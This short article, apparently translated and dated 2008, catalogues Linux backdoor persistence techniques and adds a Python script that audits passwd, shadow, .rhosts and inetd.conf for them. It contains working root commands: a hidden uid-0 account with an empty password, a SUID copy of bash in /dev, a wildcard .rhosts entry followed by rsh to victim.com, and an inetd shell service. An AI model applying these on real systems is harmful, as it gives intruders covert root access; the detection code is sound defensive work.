A brief analysis of Linux backdoor techniques and how they are used in practice
  Add date: 07/12/2008   Publishing date: 07/12/2008

Backdoor overview

  A backdoor is a technique an intruder puts in place after gaining full control of a system, so that getting back in next time is convenient.
  It is generally implemented by modifying system configuration files and installing third-party backdoor tools.
  Its characteristics include stealth, the ability to bypass system logs, and being hard for the administrator to discover.

Commonly used backdoor techniques

  Adding a superuser account
  Cracking/sniffing user passwords
  Planting a SUID shell
  rhosts + +
  Using system service programs
  TCP/UDP/ICMP shell
  Crontab scheduled tasks
  Shared library files
  Rootkit toolkits
  Loadable kernel modules (LKM)

Adding a superuser account

  # echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd
  # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
  If the system does not permit remote login for uid=0 users,
  an ordinary user account also needs to be added.

Cracking/sniffing user passwords

  After the shadow file has been obtained, weak user passwords are cracked
  with the John the Ripper tool.
  Sniffing tools such as sniffit are installed to monitor ports such as telnet and ftp
  and collect user passwords.

Planting a SUID shell

  # cp /bin/bash /dev/.rootshell 
  # chmod u+s /dev/.rootshell 
  An ordinary user who runs /dev/.rootshell on this machine
  obtains a shell with root privileges.

rhosts + +

  # echo "+ +" > /.rhosts
  # rsh -l root victim.com csh -i
  A root shell can then be obtained remotely.

Using system service programs

  Modify /etc/inetd.conf:
  daytime stream tcp nowait /bin/sh sh -I
  Replace inetd service programs such as telnetd and rexecd
  with trojaned versions.
  Redirect the login program.
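
A defender can check for the account, .rhosts and inetd.conf changes described in the sections above by parsing those files directly. The following is an added example, not part of the original article: the function names and the sample file contents are constructed for illustration, and the inetd check assumes that any field naming a shell is suspicious, whatever the field count of the line.

```python
import posixpath

# Interpreters that should never be the server program of an inetd service.
SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "dash"}

def rows(text):
    """Yield non-blank, non-comment lines of a config file."""
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            yield line

def audit(passwd, shadow, rhosts, inetd):
    """Return (file, subject, reason) tuples for the patterns described above."""
    findings = []
    for line in rows(passwd):
        f = line.split(":")
        if len(f) >= 3 and f[2] == "0" and f[0] != "root":
            findings.append(("passwd", f[0], "second uid=0 account"))
    for line in rows(shadow):
        f = line.split(":")
        if len(f) >= 2 and f[1] == "":
            findings.append(("shadow", f[0], "empty password field"))
    for line in rows(rhosts):
        if "+" in line.split():  # "+" trusts every host or every user
            findings.append(("rhosts", line, "wildcard trust entry"))
    for line in rows(inetd):
        tok = line.split()
        if any(posixpath.basename(t) in SHELLS for t in tok[1:]):
            findings.append(("inetd.conf", tok[0], "service spawns a shell"))
    return findings

# Constructed sample contents (not from a real host); the entries that get
# flagged are the ones quoted in the sections above.
PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
          "alice:x:1000:1000::/home/alice:/bin/bash\n"
          "e4gle:x:0:0::/:/bin/sh\n")
SHADOW = ("root:$6$constructed$hash:14000:0:99999:7:::\n"
          "e4gle::-1:-1:-1:-1:-1:-1:500\n")
RHOSTS = "+ +\n"
INETD = ("# constructed sample\n"
         "ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd\n"
         "daytime stream tcp nowait /bin/sh sh -I\n")

if __name__ == "__main__":
    for finding in audit(PASSWD, SHADOW, RHOSTS, INETD):
        print(*finding, sep=": ")
```

On a live host the same function can be given the contents of /etc/passwd, /etc/shadow, /.rhosts and /etc/inetd.conf.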

TCP/UDP/ICMP shell

  BindShell: most are network service programs based on the TCP/UDP
  protocols that listen on a high port, and they are very easily
  discovered.
  Ping Backdoor: the backdoor is activated by an ICMP packet
  and forms a shell channel.
  TCP ACK packet backdoor: can pass through
  firewalls.

Crontab scheduled tasks

  An already-installed backdoor program is scheduled through crontab
  to run at fixed times, generally during the night, when the system
  administrator is not online.

Shared library files

  Backdoor functions are inserted into shared libraries.

 
